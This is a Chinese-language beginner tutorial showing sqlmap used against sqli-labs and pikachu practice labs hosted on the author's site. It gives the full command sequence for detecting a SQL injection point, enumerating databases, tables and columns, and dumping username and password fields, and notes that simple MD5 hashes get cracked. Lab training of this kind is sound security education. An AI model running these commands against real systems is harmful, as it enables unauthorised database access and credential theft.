Sqlmap我想大部分都很熟悉,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞,任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而sqlmap就是自动工具中最好用的工具。那么直接进入主题。
这里我们使用靶场sql-lab和pikachu
http://wangehacker.cn/thanks.html
靶场提供在我们的官网上,免费使用,免去一些新手的烦恼。
首先我们要了解一下我们正常的注入的一个命令流程,我这里先演示最基本的一套流程
1、检测目标地址是否存在注入点。
这里使用的地址是我们网站的
http://wangehacker.cn/sqli-labs/Less-1/
这里我们需要在后面加上?id=1的传参
这里我们将这个网址直接扔到sqlmap中运行检测
s
qlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch
解释--batch是后面有一些选项我们选择默认选项
这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分
python sqlmap.py -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch
这里就代表存在着注入漏洞,我们就需要进行下一步步骤,我们扫库名
2、检测数据库中的库名
我们使用命令
sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch --dbs
3、选择需要爆的库开始爆表名
使用命令选择我们需要爆破的库名,开始爆库中的表
sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu --tables
这里我们顺利拿到表名
4、指定库名,表名爆破字段
使用命令:
sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users --columns
5、选择字段爆破字段中的内容
使用命令:
sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users -C username,password --dump
这里我们的sqlmap会对一些简单的md5加密值进行破解。到这里五步我们的基本使用方式就已经完成了,下面我们利用pikachu靶场练习不同类型的注入。